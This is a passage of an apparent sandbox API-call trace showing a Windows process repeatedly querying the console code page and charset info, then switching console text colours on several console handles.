[0086.663] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0086.663] GetConsoleOutputCP () returned 0x1b5
[0086.664] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0086.664] GetConsoleOutputCP () returned 0x1b5
[0086.664] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0086.664] GetConsoleOutputCP () returned 0x1b5
[0086.664] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0086.664] GetConsoleOutputCP () returned 0x1b5
[0086.664] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0086.664] GetConsoleOutputCP () returned 0x1b5
[0086.664] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0086.664] GetConsoleOutputCP () returned 0x1b5
[0086.664] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0086.664] GetConsoleOutputCP () returned 0x1b5
[0086.664] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0086.664] GetConsoleOutputCP () returned 0x1b5
[0086.664] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0086.664] GetConsoleOutputCP () returned 0x1b5
[0086.664] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0086.664] GetConsoleOutputCP () returned 0x1b5
[0086.664] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0086.665] GetConsoleOutputCP () returned 0x1b5
[0086.665] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0086.665] GetConsoleOutputCP () returned 0x1b5
[0086.665] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0086.665] GetConsoleOutputCP () returned 0x1b5
[0086.665] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0086.665] GetConsoleOutputCP () returned 0x1b5
[0086.665] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0086.665] GetConsoleOutputCP () returned 0x1b5
[0086.665] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0086.665] GetConsoleOutputCP () returned 0x1b5
[0086.665] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0086.665] GetConsoleOutputCP () returned 0x1b5
[0086.665] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0086.665] GetConsoleOutputCP () returned 0x1b5
[0086.665] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0086.665] GetConsoleOutputCP () returned 0x1b5
[0086.665] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0086.665] GetConsoleOutputCP () returned 0x1b5
[0086.666] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0086.666] GetConsoleOutputCP () returned 0x1b5
[0086.666] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0086.666] GetConsoleOutputCP () returned 0x1b5
[0086.666] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0086.666] GetConsoleOutputCP () returned 0x1b5
[0086.666] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0086.666] GetConsoleOutputCP () returned 0x1b5
[0086.666] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a1d0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a1d0) returned 0
[0086.666] GetConsoleOutputCP () returned 0x1b5
[0086.666] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0086.666] GetConsoleOutputCP () returned 0x1b5
[0086.666] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0086.666] GetConsoleOutputCP () returned 0x1b5
[0086.666] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0086.666] GetConsoleOutputCP () returned 0x1b5
[0086.666] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0086.666] GetConsoleOutputCP () returned 0x1b5
[0086.666] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0086.667] GetConsoleOutputCP () returned 0x1b5
[0086.667] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0086.667] GetConsoleOutputCP () returned 0x1b5
[0086.667] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0086.667] GetConsoleOutputCP () returned 0x1b5
[0086.667] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0086.667] GetConsoleOutputCP () returned 0x1b5
[0086.667] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0086.667] GetConsoleOutputCP () returned 0x1b5
[0086.667] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0086.667] GetConsoleOutputCP () returned 0x1b5
[0086.667] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0086.667] GetConsoleOutputCP () returned 0x1b5
[0086.667] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0086.667] GetConsoleOutputCP () returned 0x1b5
[0086.667] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0086.667] GetConsoleOutputCP () returned 0x1b5
[0086.667] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0086.667] GetConsoleOutputCP () returned 0x1b5
[0086.668] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0086.668] GetConsoleOutputCP () returned 0x1b5
[0086.668] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0086.668] GetConsoleOutputCP () returned 0x1b5
[0086.668] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0086.668] GetConsoleOutputCP () returned 0x1b5
[0086.668] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0086.668] GetConsoleOutputCP () returned 0x1b5
[0086.668] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0086.668] GetConsoleOutputCP () returned 0x1b5
[0086.668] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0086.668] GetConsoleOutputCP () returned 0x1b5
[0086.668] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0086.668] GetConsoleOutputCP () returned 0x1b5
[0086.668] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0086.668] GetConsoleOutputCP () returned 0x1b5
[0086.668] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0086.668] GetConsoleOutputCP () returned 0x1b5
[0086.668] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0086.669] GetConsoleOutputCP () returned 0x1b5
[0086.669] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0086.669] GetConsoleOutputCP () returned 0x1b5
[0086.669] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0086.669] GetConsoleOutputCP () returned 0x1b5
[0086.669] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0086.669] GetConsoleOutputCP () returned 0x1b5
[0086.669] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0086.669] GetConsoleOutputCP () returned 0x1b5
[0086.669] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0086.669] GetConsoleOutputCP () returned 0x1b5
[0086.669] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0086.669] GetConsoleOutputCP () returned 0x1b5
[0086.669] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0086.669] GetConsoleOutputCP () returned 0x1b5
[0086.669] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0086.669] GetConsoleOutputCP () returned 0x1b5
[0086.669] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0086.669] GetConsoleOutputCP () returned 0x1b5
[0086.670] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0086.670] GetConsoleOutputCP () returned 0x1b5
[0086.670] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0086.670] GetConsoleOutputCP () returned 0x1b5
[0086.670] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0086.670] GetConsoleOutputCP () returned 0x1b5
[0086.670] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0086.670] GetConsoleOutputCP () returned 0x1b5
[0086.670] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0086.670] GetConsoleOutputCP () returned 0x1b5
[0086.670] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0086.670] GetConsoleOutputCP () returned 0x1b5
[0086.670] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0086.670] GetConsoleOutputCP () returned 0x1b5
[0086.670] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0086.670] GetConsoleOutputCP () returned 0x1b5
[0086.670] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0086.670] GetConsoleOutputCP () returned 0x1b5
[0086.670] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0086.670] GetConsoleOutputCP () returned 0x1b5
[0086.671] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0086.671] GetConsoleOutputCP () returned 0x1b5
[0086.671] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0086.671] GetConsoleOutputCP () returned 0x1b5
[0086.671] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0086.671] GetConsoleOutputCP () returned 0x1b5
[0086.671] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0086.671] GetConsoleOutputCP () returned 0x1b5
[0086.671] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0086.671] GetConsoleOutputCP () returned 0x1b5
[0086.671] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0086.671] GetConsoleOutputCP () returned 0x1b5
[0086.671] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0086.671] GetConsoleOutputCP () returned 0x1b5
[0086.671] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0086.671] GetConsoleOutputCP () returned 0x1b5
[0086.671] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0086.671] GetConsoleOutputCP () returned 0x1b5
[0086.672] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0086.672] GetConsoleOutputCP () returned 0x1b5
[0086.672] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0086.672] GetConsoleOutputCP () returned 0x1b5
[0086.672] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0086.672] GetConsoleOutputCP () returned 0x1b5
[0086.672] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0086.672] GetConsoleOutputCP () returned 0x1b5
[0086.672] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0086.672] GetConsoleOutputCP () returned 0x1b5
[0086.672] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0086.672] GetConsoleOutputCP () returned 0x1b5
[0086.672] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0086.672] GetConsoleOutputCP () returned 0x1b5
[0086.672] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0086.672] GetConsoleOutputCP () returned 0x1b5
[0086.672] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0086.672] GetConsoleOutputCP () returned 0x1b5
[0086.672] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0086.672] GetConsoleOutputCP () returned 0x1b5
[0086.673] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0086.673] GetConsoleOutputCP () returned 0x1b5
[0086.673] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0086.673] GetConsoleOutputCP () returned 0x1b5
[0086.673] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0086.673] GetConsoleOutputCP () returned 0x1b5
[0086.673] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0086.673] GetConsoleOutputCP () returned 0x1b5
[0086.673] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0086.673] GetConsoleOutputCP () returned 0x1b5
[0086.673] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0086.673] GetConsoleOutputCP () returned 0x1b5
[0086.673] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0086.673] GetConsoleOutputCP () returned 0x1b5
[0086.673] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0086.673] GetConsoleOutputCP () returned 0x1b5
[0086.673] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0086.674] GetConsoleOutputCP () returned 0x1b5
[0086.674] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0086.674] GetConsoleOutputCP () returned 0x1b5
[0086.674] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0086.674] GetConsoleOutputCP () returned 0x1b5
[0086.674] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0086.674] GetConsoleOutputCP () returned 0x1b5
[0086.674] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0086.674] GetConsoleOutputCP () returned 0x1b5
[0086.674] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0086.674] GetConsoleOutputCP () returned 0x1b5
[0086.674] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0086.674] GetConsoleOutputCP () returned 0x1b5
[0086.674] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0086.674] GetConsoleOutputCP () returned 0x1b5
[0086.674] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0086.674] GetConsoleOutputCP () returned 0x1b5
[0086.675] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a1d0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a1d0) returned 0
[0086.675] GetConsoleOutputCP () returned 0x1b5
[0086.675] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0086.675] GetConsoleOutputCP () returned 0x1b5
[0086.675] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0086.675] GetConsoleOutputCP () returned 0x1b5
[0086.675] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0086.675] GetConsoleOutputCP () returned 0x1b5
[0086.675] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0086.730] SetConsoleTextAttribute (hConsoleOutput=0x133, wAttributes=0xc) returned 1
[0086.731] SetConsoleTextAttribute (hConsoleOutput=0x133, wAttributes=0xc) returned 1
[0086.732] SetConsoleTextAttribute (hConsoleOutput=0x133, wAttributes=0x7) returned 1
[0086.732] SetConsoleTextAttribute (hConsoleOutput=0x133, wAttributes=0x7) returned 1
[0086.734] SetConsoleTextAttribute (hConsoleOutput=0x13f, wAttributes=0xc) returned 1
[0086.735] SetConsoleTextAttribute (hConsoleOutput=0x13f, wAttributes=0xc) returned 1
[0086.736] SetConsoleTextAttribute (hConsoleOutput=0x13f, wAttributes=0x7) returned 1
[0086.736] SetConsoleTextAttribute (hConsoleOutput=0x13f, wAttributes=0x7) returned 1
[0086.738] SetConsoleTextAttribute (hConsoleOutput=0x14b, wAttributes=0xc) returned 1
[0086.739] SetConsoleTextAttribute (hConsoleOutput=0x14b, wAttributes=0xc) returned 1
[0086.740] SetConsoleTextAttribute (hConsoleOutput=0x14b, wAttributes=0x7) returned 1
[0086.741] SetConsoleTextAttribute (hConsoleOutput=0x14b, wAttributes=0x7) returned 1
[0086.742] SetConsoleTextAttribute (hConsoleOutput=0x157, wAttributes=0xc) returned 1
[0086.743] SetConsoleTextAttribute (hConsoleOutput=0x157, wAttributes=0xc) returned 1
[0086.744] SetConsoleTextAttribute (hConsoleOutput=0x157, wAttributes=0x7) returned 1
[0086.745] SetConsoleTextAttribute (hConsoleOutput=0x157, wAttributes=0x7) returned 1
[0086.746] SetConsoleTextAttribute (hConsoleOutput=0x163, wAttributes=0xc) returned 1
[0086.747] SetConsoleTextAttribute (hConsoleOutput=0x163, wAttributes=0xc) returned 1
[0086.748] SetConsoleTextAttribute (hConsoleOutput=0x163, wAttributes=0x7) returned 1
[0086.749] SetConsoleTextAttribute (hConsoleOutput=0x163, wAttributes=0x7) returned 1
[0086.750] SetConsoleTextAttribute (hConsoleOutput=0x16f, wAttributes=0xc) returned 1
[0086.751] SetConsoleTextAttribute (hConsoleOutput=0x16f, wAttributes=0xc) returned 1
[0086.752] SetConsoleTextAttribute (hConsoleOutput=0x16f, wAttributes=0x7) returned 1
[0086.753] SetConsoleTextAttribute (hConsoleOutput=0x16f, wAttributes=0x7) returned 1
[0086.754] SetConsoleTextAttribute (hConsoleOutput=0x17b, wAttributes=0xc) returned 1
[0086.755] SetConsoleTextAttribute (hConsoleOutput=0x17b, wAttributes=0xc) returned 1
[0086.756] SetConsoleTextAttribute (hConsoleOutput=0x17b, wAttributes=0x7) returned 1
[0086.757] SetConsoleTextAttribute (hConsoleOutput=0x17b, wAttributes=0x7) returned 1
[0086.758] SetConsoleTextAttribute (hConsoleOutput=0x187, wAttributes=0xc) returned 1
[0086.759] SetConsoleTextAttribute (hConsoleOutput=0x187, wAttributes=0xc) returned 1
[0086.760] SetConsoleTextAttribute (hConsoleOutput=0x187, wAttributes=0x7) returned 1
[0086.761] SetConsoleTextAttribute (hConsoleOutput=0x187, wAttributes=0x7) returned 1
[0086.763] SetConsoleTextAttribute (hConsoleOutput=0x193, wAttributes=0xc) returned 1
[0086.763] SetConsoleTextAttribute (hConsoleOutput=0x193, wAttributes=0xc) returned 1
[0086.764] SetConsoleTextAttribute (hConsoleOutput=0x193, wAttributes=0x7) returned 1
[0086.765] SetConsoleTextAttribute (hConsoleOutput=0x193, wAttributes=0x7) returned 1
[0086.767] SetConsoleTextAttribute (hConsoleOutput=0x19f, wAttributes=0xc) returned 1
[0086.767] SetConsoleTextAttribute (hConsoleOutput=0x19f, wAttributes=0xc) returned 1
[0086.768] SetConsoleTextAttribute (hConsoleOutput=0x19f, wAttributes=0x7) returned 1
[0086.769] SetConsoleTextAttribute (hConsoleOutput=0x19f, wAttributes=0x7) returned 1
[0086.770] SetConsoleTextAttribute (hConsoleOutput=0x1ab, wAttributes=0xc) returned 1
[0086.771] SetConsoleTextAttribute (hConsoleOutput=0x1ab, wAttributes=0xc) returned 1
[0086.772] SetConsoleTextAttribute (hConsoleOutput=0x1ab, wAttributes=0x7) returned 1
[0086.773] SetConsoleTextAttribute (hConsoleOutput=0x1ab, wAttributes=0x7) returned 1
[0086.775] SetConsoleTextAttribute (hConsoleOutput=0x1b7, wAttributes=0xc) returned 1
[0086.775] SetConsoleTextAttribute (hConsoleOutput=0x1b7, wAttributes=0xc) returned 1
[0086.776] SetConsoleTextAttribute (hConsoleOutput=0x1b7, wAttributes=0x7) returned 1
[0086.777] SetConsoleTextAttribute (hConsoleOutput=0x1b7, wAttributes=0x7) returned 1
[0086.779] SetConsoleTextAttribute (hConsoleOutput=0x1c3, wAttributes=0xc) returned 1
[0086.779] SetConsoleTextAttribute (hConsoleOutput=0x1c3, wAttributes=0xc) returned 1
[0086.780] SetConsoleTextAttribute (hConsoleOutput=0x1c3, wAttributes=0x7) returned 1
